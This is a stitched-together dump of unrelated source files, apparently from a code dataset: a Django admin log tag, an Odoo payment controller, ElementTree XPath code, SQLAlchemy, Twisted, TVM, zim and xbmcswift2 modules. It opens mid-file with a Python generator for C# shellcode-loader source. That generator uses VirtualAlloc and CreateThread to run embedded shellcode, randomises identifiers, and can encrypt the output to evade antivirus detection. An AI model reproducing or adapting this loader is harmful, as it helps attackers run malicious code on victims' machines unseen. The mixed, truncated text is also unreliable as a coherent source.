namespaceName = helpers.randomString()
className = helpers.randomString()
bytearrayName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
# get 12 random variables for the API imports
r = [helpers.randomString() for x in xrange(12)]
payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
payloadCode += "namespace %s { class %s { static void Main() {\n" % (namespaceName, className)
payloadCode += "byte[] %s = {%s};" % (bytearrayName,Shellcode)
payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)
# payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
if self.required_options["USE_ARYA"][0].lower() == "y":
payloadCode = encryption.arya(payloadCode)
return payloadCode
|
gpl-3.0
|
ajaali/django
|
django/contrib/admin/templatetags/log.py
|
499
|
2080
|
from django import template
from django.contrib.admin.models import LogEntry
register = template.Library()
class AdminLogNode(template.Node):
def __init__(self, limit, varname, user):
self.limit, self.varname, self.user = limit, varname, user
def __repr__(self):
return "<GetAdminLog Node>"
def render(self, context):
if self.user is None:
entries = LogEntry.objects.all()
else:
user_id = self.user
if not user_id.isdigit():
user_id = context[self.user].pk
entries = LogEntry.objects.filter(user__pk=user_id)
context[self.varname] = entries.select_related('content_type', 'user')[:int(self.limit)]
return ''
@register.tag
def get_admin_log(parser, token):
"""
Populates a template variable with the admin log for the given criteria.
Usage::
{% get_admin_log [limit] as [varname] for_user [context_var_containing_user_obj] %}
Examples::
{% get_admin_log 10 as admin_log for_user 23 %}
{% get_admin_log 10 as admin_log for_user user %}
{% get_admin_log 10 as admin_log %}
Note that ``context_var_containing_user_obj`` can be a hard-coded integer
(user ID) or the name of a template context variable containing the user
object whose ID you want.
"""
tokens = token.contents.split()
if len(tokens) < 4:
raise template.TemplateSyntaxError(
"'get_admin_log' statements require two arguments")
if not tokens[1].isdigit():
raise template.TemplateSyntaxError(
"First argument to 'get_admin_log' must be an integer")
if tokens[2] != 'as':
raise template.TemplateSyntaxError(
"Second argument to 'get_admin_log' must be 'as'")
if len(tokens) > 4:
if tokens[4] != 'for_user':
raise template.TemplateSyntaxError(
"Fourth argument to 'get_admin_log' must be 'for_user'")
return AdminLogNode(limit=tokens[1], varname=tokens[3], user=(tokens[5] if len(tokens) > 5 else None))
|
bsd-3-clause
|
minhphung171093/GreenERP_V8
|
openerp/addons/payment_sips/controllers/main.py
|
153
|
1864
|
# -*- coding: utf-8 -*-
try:
import simplejson as json
except ImportError:
import json
import logging
import werkzeug
from openerp import http
from openerp.http import request
_logger = logging.getLogger(__name__)
class SipsController(http.Controller):
_notify_url = '/payment/sips/ipn/'
_return_url = '/payment/sips/dpn/'
def _get_return_url(self, **post):
""" Extract the return URL from the data coming from sips. """
return_url = post.pop('return_url', '')
if not return_url:
tx_obj = request.registry['payment.transaction']
data = tx_obj._sips_data_to_object(post.get('Data'))
custom = json.loads(data.pop('returnContext', False) or '{}')
return_url = custom.get('return_url', '/')
return return_url
def sips_validate_data(self, **post):
res = False
env = request.env
tx_obj = env['payment.transaction']
acquirer_obj = env['payment.acquirer']
sips = acquirer_obj.search([('provider', '=', 'sips')], limit=1)
security = sips._sips_generate_shasign(post)
if security == post['Seal']:
_logger.debug('Sips: validated data')
res = tx_obj.sudo().form_feedback(post, 'sips')
else:
_logger.warning('Sips: data are corrupted')
return res
@http.route([
'/payment/sips/ipn/'],
type='http', auth='none', methods=['POST'])
def sips_ipn(self, **post):
""" Sips IPN. """
self.sips_validate_data(**post)
return ''
@http.route([
'/payment/sips/dpn'], type='http', auth="none", methods=['POST'])
def sips_dpn(self, **post):
""" Sips DPN """
return_url = self._get_return_url(**post)
self.sips_validate_data(**post)
return werkzeug.utils.redirect(return_url)
|
agpl-3.0
|
pombredanne/teamwork
|
w2/static/Brython2.0.0-20140209-164925/Lib/xml/etree/ElementPath.py
|
785
|
9477
|
#
# ElementTree
# $Id: ElementPath.py 3375 2008-02-13 08:05:08Z fredrik $
#
# limited xpath support for element trees
#
# history:
# 2003-05-23 fl created
# 2003-05-28 fl added support for // etc
# 2003-08-27 fl fixed parsing of periods in element names
# 2007-09-10 fl new selection engine
# 2007-09-12 fl fixed parent selector
# 2007-09-13 fl added iterfind; changed findall to return a list
# 2007-11-30 fl added namespaces support
# 2009-10-30 fl added child element value filter
#
# Copyright (c) 2003-2009 by Fredrik Lundh. All rights reserved.
#
# [email protected]
# http://www.pythonware.com
#
# --------------------------------------------------------------------
# The ElementTree toolkit is
#
# Copyright (c) 1999-2009 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
# Licensed to PSF under a Contributor Agreement.
# See http://www.python.org/psf/license for licensing details.
##
# Implementation module for XPath support. There's usually no reason
# to import this module directly; the <b>ElementTree</b> does this for
# you, if needed.
##
import re
xpath_tokenizer_re = re.compile(
    r"("
    r"'[^']*'|\"[^\"]*\"|"
    r"::|"
    r"//?|"
    r"\.\.|"
    r"\(\)|"
    r"[/.*:\[\]\(\)@=])|"
    r"((?:\{[^}]+\})?[^/\[\]\(\)@=\s]+)|"
    r"\s+"
    )
def xpath_tokenizer(pattern, namespaces=None):
for token in xpath_tokenizer_re.findall(pattern):
tag = token[1]
if tag and tag[0] != "{" and ":" in tag:
try:
prefix, uri = tag.split(":", 1)
if not namespaces:
raise KeyError
yield token[0], "{%s}%s" % (namespaces[prefix], uri)
except KeyError:
raise SyntaxError("prefix %r not found in prefix map" % prefix)
else:
yield token
def get_parent_map(context):
parent_map = context.parent_map
if parent_map is None:
context.parent_map = parent_map = {}
for p in context.root.iter():
for e in p:
parent_map[e] = p
return parent_map
def prepare_child(next, token):
tag = token[1]
def select(context, result):
for elem in result:
for e in elem:
if e.tag == tag:
yield e
return select
def prepare_star(next, token):
def select(context, result):
for elem in result:
for e in elem:
yield e
return select
def prepare_self(next, token):
def select(context, result):
for elem in result:
yield elem
return select
def prepare_descendant(next, token):
token = next()
if token[0] == "*":
tag = "*"
elif not token[0]:
tag = token[1]
else:
raise SyntaxError("invalid descendant")
def select(context, result):
for elem in result:
for e in elem.iter(tag):
if e is not elem:
yield e
return select
def prepare_parent(next, token):
def select(context, result):
# FIXME: raise error if .. is applied at toplevel?
parent_map = get_parent_map(context)
result_map = {}
for elem in result:
if elem in parent_map:
parent = parent_map[elem]
if parent not in result_map:
result_map[parent] = None
yield parent
return select
def prepare_predicate(next, token):
# FIXME: replace with real parser!!! refs:
# http://effbot.org/zone/simple-iterator-parser.htm
# http://javascript.crockford.com/tdop/tdop.html
signature = []
predicate = []
while 1:
token = next()
if token[0] == "]":
break
if token[0] and token[0][:1] in "'\"":
token = "'", token[0][1:-1]
signature.append(token[0] or "-")
predicate.append(token[1])
signature = "".join(signature)
# use signature to determine predicate type
if signature == "@-":
# [@attribute] predicate
key = predicate[1]
def select(context, result):
for elem in result:
if elem.get(key) is not None:
yield elem
return select
if signature == "@-='":
# [@attribute='value']
key = predicate[1]
value = predicate[-1]
def select(context, result):
for elem in result:
if elem.get(key) == value:
yield elem
return select
    if signature == "-" and not re.match(r"\d+$", predicate[0]):
# [tag]
tag = predicate[0]
def select(context, result):
for elem in result:
if elem.find(tag) is not None:
yield elem
return select
    if signature == "-='" and not re.match(r"\d+$", predicate[0]):
# [tag='value']
tag = predicate[0]
value = predicate[-1]
def select(context, result):
for elem in result:
for e in elem.findall(tag):
if "".join(e.itertext()) == value:
yield elem
break
return select
if signature == "-" or signature == "-()" or signature == "-()-":
# [index] or [last()] or [last()-index]
if signature == "-":
index = int(predicate[0]) - 1
else:
if predicate[0] != "last":
raise SyntaxError("unsupported function")
if signature == "-()-":
try:
index = int(predicate[2]) - 1
except ValueError:
raise SyntaxError("unsupported expression")
else:
index = -1
def select(context, result):
parent_map = get_parent_map(context)
for elem in result:
try:
parent = parent_map[elem]
# FIXME: what if the selector is "*" ?
elems = list(parent.findall(elem.tag))
if elems[index] is elem:
yield elem
except (IndexError, KeyError):
pass
return select
raise SyntaxError("invalid predicate")
ops = {
"": prepare_child,
"*": prepare_star,
".": prepare_self,
"..": prepare_parent,
"//": prepare_descendant,
"[": prepare_predicate,
}
_cache = {}
class _SelectorContext:
parent_map = None
def __init__(self, root):
self.root = root
# --------------------------------------------------------------------
##
# Generate all matching objects.
def iterfind(elem, path, namespaces=None):
# compile selector pattern
if path[-1:] == "/":
path = path + "*" # implicit all (FIXME: keep this?)
try:
selector = _cache[path]
except KeyError:
if len(_cache) > 100:
_cache.clear()
if path[:1] == "/":
raise SyntaxError("cannot use absolute path on element")
next = iter(xpath_tokenizer(path, namespaces)).__next__
token = next()
selector = []
while 1:
try:
selector.append(ops[token[0]](next, token))
except StopIteration:
raise SyntaxError("invalid path")
try:
token = next()
if token[0] == "/":
token = next()
except StopIteration:
break
_cache[path] = selector
# execute selector pattern
result = [elem]
context = _SelectorContext(elem)
for select in selector:
result = select(context, result)
return result
##
# Find first matching object.
def find(elem, path, namespaces=None):
try:
return next(iterfind(elem, path, namespaces))
except StopIteration:
return None
##
# Find all matching objects.
def findall(elem, path, namespaces=None):
return list(iterfind(elem, path, namespaces))
##
# Find text for first matching object.
def findtext(elem, path, default=None, namespaces=None):
try:
elem = next(iterfind(elem, path, namespaces))
return elem.text or ""
except StopIteration:
return default
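# Illustrative usage sketch (added, not part of the original module). These
# helpers are normally reached through ElementTree's Element.find()/findall(),
# but can be called directly on an element:
#
#   import xml.etree.ElementTree as ET
#   root = ET.fromstring("<root><item id='1'>a</item><item id='2'>b</item></root>")
#   findall(root, "item")              # list with both <item> elements
#   find(root, "item[@id='2']")        # the second <item> element
#   findtext(root, "item[@id='2']")    # 'b'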
|
gpl-2.0
|
ychen820/microblog
|
flask/lib/python2.7/site-packages/sqlalchemy/dialects/mysql/__init__.py
|
79
|
1171
|
# mysql/__init__.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from . import base, mysqldb, oursql, \
pyodbc, zxjdbc, mysqlconnector, pymysql,\
gaerdbms, cymysql
# default dialect
base.dialect = mysqldb.dialect
from .base import \
BIGINT, BINARY, BIT, BLOB, BOOLEAN, CHAR, DATE, DATETIME, \
DECIMAL, DOUBLE, ENUM, DECIMAL,\
FLOAT, INTEGER, INTEGER, LONGBLOB, LONGTEXT, MEDIUMBLOB, \
MEDIUMINT, MEDIUMTEXT, NCHAR, \
NVARCHAR, NUMERIC, SET, SMALLINT, REAL, TEXT, TIME, TIMESTAMP, \
TINYBLOB, TINYINT, TINYTEXT,\
VARBINARY, VARCHAR, YEAR, dialect
__all__ = (
'BIGINT', 'BINARY', 'BIT', 'BLOB', 'BOOLEAN', 'CHAR', 'DATE', 'DATETIME',
'DECIMAL', 'DOUBLE', 'ENUM', 'DECIMAL', 'FLOAT', 'INTEGER', 'INTEGER',
'LONGBLOB', 'LONGTEXT', 'MEDIUMBLOB', 'MEDIUMINT', 'MEDIUMTEXT', 'NCHAR',
'NVARCHAR', 'NUMERIC', 'SET', 'SMALLINT', 'REAL', 'TEXT', 'TIME',
'TIMESTAMP', 'TINYBLOB', 'TINYINT', 'TINYTEXT', 'VARBINARY', 'VARCHAR',
'YEAR', 'dialect'
)
|
bsd-3-clause
|
sshnaidm/ru
|
script.module.xbmcswift2/lib/xbmcswift2/logger.py
|
34
|
2979
|
'''
xbmcswift2.log
--------------
This module contains the xbmcswift2 logger as well as a convenience
method for creating new loggers.
:copyright: (c) 2012 by Jonathan Beluch
:license: GPLv3, see LICENSE for more details.
'''
import logging
from xbmcswift2 import CLI_MODE
# TODO: Add logging to a file as well when on CLI with lowest threshold
# possible
#fh = logging.FileHandler('log_filename.txt')
#fh.setLevel(logging.DEBUG)
#fh.setFormatter(formatter)
#log.addHandler(fh)
# TODO: Allow a global flag to set logging level when dealing with XBMC
# TODO: Add -q and -v flags to CLI to quiet or enable more verbose logging
class XBMCFilter(object):
'''A logging filter that streams to STDOUT or to the xbmc log if
running inside XBMC.
'''
python_to_xbmc = {
'DEBUG': 'LOGDEBUG',
'INFO': 'LOGNOTICE',
'WARNING': 'LOGWARNING',
'ERROR': 'LOGERROR',
'CRITICAL': 'LOGSEVERE',
}
xbmc_levels = {
'LOGDEBUG': 0,
'LOGINFO': 1,
'LOGNOTICE': 2,
'LOGWARNING': 3,
'LOGERROR': 4,
'LOGSEVERE': 5,
'LOGFATAL': 6,
'LOGNONE': 7,
}
def __init__(self, prefix):
self.prefix = prefix
def filter(self, record):
        '''Returns True for all records when running in the CLI, otherwise
        returns False.
When running inside XBMC it calls the xbmc.log() method and prevents
the message from being double printed to STDOUT.
'''
# When running in XBMC, any logged statements will be double printed
# since we are calling xbmc.log() explicitly. Therefore we return False
# so every log message is filtered out and not printed again.
if CLI_MODE:
return True
else:
# Must not be imported until here because of import order issues
# when running in CLI
from xbmcswift2 import xbmc
xbmc_level = XBMCFilter.xbmc_levels.get(
XBMCFilter.python_to_xbmc.get(record.levelname))
xbmc.log('%s%s' % (self.prefix, record.getMessage()), xbmc_level)
return False
if CLI_MODE:
GLOBAL_LOG_LEVEL = logging.INFO
else:
GLOBAL_LOG_LEVEL = logging.DEBUG
def setup_log(name):
'''Returns a logging instance for the provided name. The returned
object is an instance of logging.Logger. Logged messages will be
printed to stderr when running in the CLI, or forwarded to XBMC's
log when running in XBMC mode.
'''
_log = logging.getLogger(name)
_log.setLevel(GLOBAL_LOG_LEVEL)
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - [%(name)s] %(message)s')
handler.setFormatter(formatter)
_log.addHandler(handler)
_log.addFilter(XBMCFilter('[%s] ' % name))
return _log
# The xbmcswift2 log
# Plugin writers should use plugin.log instead.
log = setup_log('xbmcswift2')
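# Illustrative usage (hypothetical add-on name): messages go to stderr on the
# CLI and to xbmc.log() inside XBMC, as handled by XBMCFilter above.
#   mylog = setup_log('plugin.video.example')
#   mylog.info('listing items')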
|
gpl-2.0
|
dmlc/tvm
|
tests/python/contrib/test_ethosn/test_constant_duplication.py
|
2
|
2958
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test that constants aren't duplicated for Ethos-N"""
import numpy as np
import tvm
from tvm import relay
from tvm.relay.op.contrib.ethosn import ethosn_available
from . import infrastructure as tei
def _get_model():
"""Return a model and any parameters it may have"""
shape = (1, 4, 4, 4)
kernel_h = 3
kernel_w = 3
out_channels = 8
a = relay.var("a", shape=shape, dtype="uint8")
add_const_value = tvm.nd.array(np.random.randint(0, high=10, size=shape, dtype="uint8"))
add_const = relay.const(add_const_value, "uint8")
a = relay.add(a, add_const)
weight_shape = (kernel_h, kernel_w, shape[3], out_channels)
w = tvm.nd.array(np.random.randint(low=0, high=255, size=weight_shape, dtype="uint8"))
weights = relay.const(w, "uint8")
conv = relay.qnn.op.conv2d(
a,
weights,
input_zero_point=relay.const(0, "int32"),
kernel_zero_point=relay.const(0, "int32"),
input_scale=relay.const(0.3, "float32"),
kernel_scale=relay.const(0.4, "float32"),
kernel_size=(kernel_h, kernel_w),
data_layout="NHWC",
kernel_layout="HWIO",
dilation=(1, 1),
strides=(1, 1),
groups=1,
channels=out_channels,
padding=(0, 0, 0, 0),
out_dtype="int32",
)
b = tvm.nd.array(np.random.randint(0, high=10, size=(out_channels,), dtype="int32"))
biasc = relay.const(b, "int32")
bias = relay.nn.bias_add(conv, biasc, axis=3)
req = relay.qnn.op.requantize(
bias,
relay.const(0.3 * 0.4, "float32"), # input zero scale
relay.const(0, "int32"), # input zero point
relay.const(0.4, "float32"), # output zero scale
relay.const(0, "int32"), # output zero point
out_dtype="uint8",
)
params = {"w": w, "b": b}
return req, params
def test_constant_duplication():
if not ethosn_available():
return
model, params = _get_model()
mod = tei.make_module(model, params)
res = tei.build(mod, params, npu=True, expected_host_ops=1)
for key, value in res.params.items():
assert key == "p0"
assert value.asnumpy().size == 64
|
apache-2.0
|
DarioGT/Zim-QDA
|
zim/plugins/spell.py
|
1
|
4224
|
# -*- coding: utf-8 -*-
# Copyright 2008 Jaap Karssenberg <[email protected]>
'''Spell check plugin based on gtkspell'''
import os
import gobject
from zim.config import get_environ
from zim.plugins import PluginClass
from zim.gui.widgets import ErrorDialog
from zim.signals import SIGNAL_AFTER
try:
import gtkspell
except:
gtkspell = None
ui_xml = '''
<ui>
<menubar name='menubar'>
<menu action='tools_menu'>
<placeholder name='page_tools'>
<menuitem action='toggle_spellcheck'/>
</placeholder>
</menu>
</menubar>
<toolbar name='toolbar'>
<placeholder name='tools'>
<toolitem action='toggle_spellcheck'/>
</placeholder>
</toolbar>
</ui>
'''
ui_toggle_actions = (
# name, stock id, label, accelerator, tooltip, initial state, readonly
('toggle_spellcheck', 'gtk-spell-check', _('Check _spelling'), 'F7', 'Spell check', False, True), # T: menu item
)
class SpellPlugin(PluginClass):
plugin_info = {
'name': _('Spell Checker'), # T: plugin name
'description': _('''\
Adds spell checking support using gtkspell.
This is a core plugin shipping with zim.
'''), # T: plugin description
'author': 'Jaap Karssenberg',
'help': 'Plugins:Spell Checker',
}
plugin_preferences = (
('language', 'string', 'Default Language', ''),
)
def __init__(self, ui):
PluginClass.__init__(self, ui)
self.spell = None
self.uistate.setdefault('active', False)
if self.ui.ui_type == 'gtk':
self.ui.add_toggle_actions(ui_toggle_actions, self)
self.ui.add_ui(ui_xml, self)
self.connectto(self.ui, 'open-page', order=SIGNAL_AFTER)
@classmethod
def check_dependencies(klass):
        return (gtkspell is not None), [('gtkspell', gtkspell is not None, True)]
def toggle_spellcheck(self, enable=None):
action = self.actiongroup.get_action('toggle_spellcheck')
if enable is None or enable != action.get_active():
action.activate()
else:
self.do_toggle_spellcheck(enable=enable)
def do_toggle_spellcheck(self, enable=None):
#~ print 'do_toggle_spellcheck', enable
if enable is None:
action = self.actiongroup.get_action('toggle_spellcheck')
enable = action.get_active()
textview = self.ui.mainwindow.pageview.view
if enable:
if self.spell is None:
lang = self.preferences['language'] or None
try:
self.spell = gtkspell.Spell(textview, lang)
except:
lang = lang or get_environ('LANG') or get_environ('LANGUAGE')
ErrorDialog(self.ui, (
_('Could not load spell checking for language: "%s"') % lang,
                        # T: error message - %s is replaced with language codes like "en", "en_US", or "nl_NL"
_('This could mean you don\'t have the proper\ndictionaries installed')
# T: error message explanation
) ).run()
return
else:
textview.gtkspell = self.spell # HACK used by hardcoded hook in pageview
else:
pass
else:
if self.spell is None:
pass
else:
if textview.gtkspell \
and textview.gtkspell == self.spell:
textview.gtkspell.detach()
textview.gtkspell = None
self.spell = None
self.uistate['active'] = enable
return False # we can be called from idle event
def on_open_page(self, ui, page, record):
# Assume the old object is detached by hard coded
# hook in TextView, just attach a new one.
# Use idle timer to avoid lag in page loading.
# This hook also synchronizes the state of the toggle with
# the uistate when loading the first page
self.spell = None
if self.uistate['active']:
gobject.idle_add(self.toggle_spellcheck, True)
|
gpl-2.0
|
Donkyhotay/MoonPy
|
twisted/internet/abstract.py
|
12
|
13571
|
# -*- test-case-name: twisted.test.test_abstract -*-
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Support for generic select()able objects.
Maintainer: Itamar Shtull-Trauring
"""
from zope.interface import implements
# Twisted Imports
from twisted.python import log, reflect, failure
from twisted.persisted import styles
from twisted.internet import interfaces, main
class FileDescriptor(log.Logger, styles.Ephemeral, object):
"""An object which can be operated on by select().
This is an abstract superclass of all objects which may be notified when
they are readable or writable; e.g. they have a file-descriptor that is
valid to be passed to select(2).
"""
connected = 0
producerPaused = 0
streamingProducer = 0
producer = None
disconnected = 0
disconnecting = 0
_writeDisconnecting = False
_writeDisconnected = False
dataBuffer = ""
offset = 0
SEND_LIMIT = 128*1024
implements(interfaces.IProducer, interfaces.IReadWriteDescriptor,
interfaces.IConsumer, interfaces.ITransport, interfaces.IHalfCloseableDescriptor)
def __init__(self, reactor=None):
if not reactor:
from twisted.internet import reactor
self.reactor = reactor
self._tempDataBuffer = [] # will be added to dataBuffer in doWrite
self._tempDataLen = 0
def connectionLost(self, reason):
"""The connection was lost.
This is called when the connection on a selectable object has been
lost. It will be called whether the connection was closed explicitly,
an exception occurred in an event handler, or the other end of the
connection closed it first.
Clean up state here, but make sure to call back up to FileDescriptor.
"""
self.disconnected = 1
self.connected = 0
if self.producer is not None:
self.producer.stopProducing()
self.producer = None
self.stopReading()
self.stopWriting()
def writeSomeData(self, data):
"""
Write as much as possible of the given data, immediately.
This is called to invoke the lower-level writing functionality, such
as a socket's send() method, or a file's write(); this method
returns an integer or an exception. If an integer, it is the number
of bytes written (possibly zero); if an exception, it indicates the
connection was lost.
"""
raise NotImplementedError("%s does not implement writeSomeData" %
reflect.qual(self.__class__))
def doRead(self):
"""Called when data is avaliable for reading.
Subclasses must override this method. The result will be interpreted
in the same way as a result of doWrite().
"""
raise NotImplementedError("%s does not implement doRead" %
reflect.qual(self.__class__))
def doWrite(self):
"""
Called when data can be written.
A result that is true (which will be a negative number or an
exception instance) indicates that the connection was lost. A false
result implies the connection is still there; a result of 0
indicates no write was done, and a result of None indicates that a
write was done.
"""
if len(self.dataBuffer) - self.offset < self.SEND_LIMIT:
# If there is currently less than SEND_LIMIT bytes left to send
# in the string, extend it with the array data.
self.dataBuffer = buffer(self.dataBuffer, self.offset) + "".join(self._tempDataBuffer)
self.offset = 0
self._tempDataBuffer = []
self._tempDataLen = 0
# Send as much data as you can.
if self.offset:
l = self.writeSomeData(buffer(self.dataBuffer, self.offset))
else:
l = self.writeSomeData(self.dataBuffer)
# There is no writeSomeData implementation in Twisted which returns
# 0, but the documentation for writeSomeData used to claim negative
# integers meant connection lost. Keep supporting this here,
# although it may be worth deprecating and removing at some point.
if l < 0 or isinstance(l, Exception):
return l
if l == 0 and self.dataBuffer:
result = 0
else:
result = None
self.offset += l
# If there is nothing left to send,
if self.offset == len(self.dataBuffer) and not self._tempDataLen:
self.dataBuffer = ""
self.offset = 0
# stop writing.
self.stopWriting()
# If I've got a producer who is supposed to supply me with data,
if self.producer is not None and ((not self.streamingProducer)
or self.producerPaused):
# tell them to supply some more.
self.producerPaused = 0
self.producer.resumeProducing()
elif self.disconnecting:
# But if I was previously asked to let the connection die, do
# so.
return self._postLoseConnection()
elif self._writeDisconnecting:
            # I was previously asked to half-close the connection.
result = self._closeWriteConnection()
self._writeDisconnected = True
return result
return result
def _postLoseConnection(self):
"""Called after a loseConnection(), when all data has been written.
Whatever this returns is then returned by doWrite.
"""
# default implementation, telling reactor we're finished
return main.CONNECTION_DONE
def _closeWriteConnection(self):
# override in subclasses
pass
def writeConnectionLost(self, reason):
# in current code should never be called
self.connectionLost(reason)
def readConnectionLost(self, reason):
# override in subclasses
self.connectionLost(reason)
def write(self, data):
"""Reliably write some data.
The data is buffered until the underlying file descriptor is ready
for writing. If there is more than C{self.bufferSize} data in the
buffer and this descriptor has a registered streaming producer, its
C{pauseProducing()} method will be called.
"""
if isinstance(data, unicode): # no, really, I mean it
raise TypeError("Data must not be unicode")
if not self.connected or self._writeDisconnected:
return
if data:
self._tempDataBuffer.append(data)
self._tempDataLen += len(data)
# If we are responsible for pausing our producer,
if self.producer is not None and self.streamingProducer:
# and our buffer is full,
if len(self.dataBuffer) + self._tempDataLen > self.bufferSize:
# pause it.
self.producerPaused = 1
self.producer.pauseProducing()
self.startWriting()
def writeSequence(self, iovec):
"""Reliably write a sequence of data.
Currently, this is a convenience method roughly equivalent to::
for chunk in iovec:
fd.write(chunk)
It may have a more efficient implementation at a later time or in a
different reactor.
As with the C{write()} method, if a buffer size limit is reached and a
streaming producer is registered, it will be paused until the buffered
data is written to the underlying file descriptor.
"""
if not self.connected or not iovec or self._writeDisconnected:
return
self._tempDataBuffer.extend(iovec)
for i in iovec:
self._tempDataLen += len(i)
# If we are responsible for pausing our producer,
if self.producer is not None and self.streamingProducer:
# and our buffer is full,
if len(self.dataBuffer) + self._tempDataLen > self.bufferSize:
# pause it.
self.producerPaused = 1
self.producer.pauseProducing()
self.startWriting()
def loseConnection(self, _connDone=failure.Failure(main.CONNECTION_DONE)):
"""Close the connection at the next available opportunity.
Call this to cause this FileDescriptor to lose its connection. It will
first write any data that it has buffered.
If there is data buffered yet to be written, this method will cause the
transport to lose its connection as soon as it's done flushing its
write buffer. If you have a producer registered, the connection won't
be closed until the producer is finished. Therefore, make sure you
unregister your producer when it's finished, or the connection will
never close.
"""
if self.connected and not self.disconnecting:
if self._writeDisconnected:
# doWrite won't trigger the connection close anymore
self.stopReading()
self.stopWriting()
self.connectionLost(_connDone)
else:
self.stopReading()
self.startWriting()
self.disconnecting = 1
def loseWriteConnection(self):
self._writeDisconnecting = True
self.startWriting()
def stopReading(self):
"""Stop waiting for read availability.
Call this to remove this selectable from being notified when it is
ready for reading.
"""
self.reactor.removeReader(self)
def stopWriting(self):
"""Stop waiting for write availability.
Call this to remove this selectable from being notified when it is ready
for writing.
"""
self.reactor.removeWriter(self)
def startReading(self):
"""Start waiting for read availability.
"""
self.reactor.addReader(self)
def startWriting(self):
"""Start waiting for write availability.
Call this to have this FileDescriptor be notified whenever it is ready for
writing.
"""
self.reactor.addWriter(self)
# Producer/consumer implementation
# first, the consumer stuff. This requires no additional work, as
# any object you can write to can be a consumer, really.
producer = None
bufferSize = 2**2**2**2
def registerProducer(self, producer, streaming):
"""Register to receive data from a producer.
This sets this selectable to be a consumer for a producer. When this
selectable runs out of data on a write() call, it will ask the producer
to resumeProducing(). When the FileDescriptor's internal data buffer is
filled, it will ask the producer to pauseProducing(). If the connection
is lost, FileDescriptor calls producer's stopProducing() method.
If streaming is true, the producer should provide the IPushProducer
interface. Otherwise, it is assumed that producer provides the
IPullProducer interface. In this case, the producer won't be asked
to pauseProducing(), but it has to be careful to write() data only
when its resumeProducing() method is called.
"""
if self.producer is not None:
raise RuntimeError("Cannot register producer %s, because producer %s was never unregistered." % (producer, self.producer))
if self.disconnected:
producer.stopProducing()
else:
self.producer = producer
self.streamingProducer = streaming
if not streaming:
producer.resumeProducing()
def unregisterProducer(self):
"""Stop consuming data from a producer, without disconnecting.
"""
self.producer = None
def stopConsuming(self):
"""Stop consuming data.
This is called when a producer has lost its connection, to tell the
consumer to go lose its connection (and break potential circular
references).
"""
self.unregisterProducer()
self.loseConnection()
# producer interface implementation
def resumeProducing(self):
assert self.connected and not self.disconnecting
self.startReading()
def pauseProducing(self):
self.stopReading()
def stopProducing(self):
self.loseConnection()
def fileno(self):
"""File Descriptor number for select().
This method must be overridden or assigned in subclasses to
indicate a valid file descriptor for the operating system.
"""
return -1
def isIPAddress(addr):
"""
Determine whether the given string represents an IPv4 address.
@type addr: C{str}
@param addr: A string which may or may not be the decimal dotted
representation of an IPv4 address.
@rtype: C{bool}
@return: C{True} if C{addr} represents an IPv4 address, C{False}
otherwise.
"""
dottedParts = addr.split('.')
if len(dottedParts) == 4:
for octet in dottedParts:
try:
value = int(octet)
except ValueError:
return False
else:
if value < 0 or value > 255:
return False
return True
return False
__all__ = ["FileDescriptor"]
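# Illustrative examples (added, not part of the original module):
#
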